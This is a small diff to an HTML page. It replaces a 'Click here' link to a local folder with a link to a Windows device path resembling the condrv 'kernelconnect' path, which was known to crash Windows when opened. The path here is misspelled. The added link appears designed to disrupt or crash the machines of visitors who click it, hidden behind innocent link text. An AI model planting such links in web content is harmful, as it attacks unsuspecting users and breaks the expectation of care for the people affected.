--- a/index.html
+++ b/index.html
@@ -5,6 +5,6 @@
 
 </head>
 <body>
-<a href='C:\Users\ASUS\Desktop\WolfreeAlpha.github.io-copia'>Click here</a>
+<a href='\\.\globalroot\device\condrv\keernrenlconnect'>Click here</a>
 </body>
 </html>
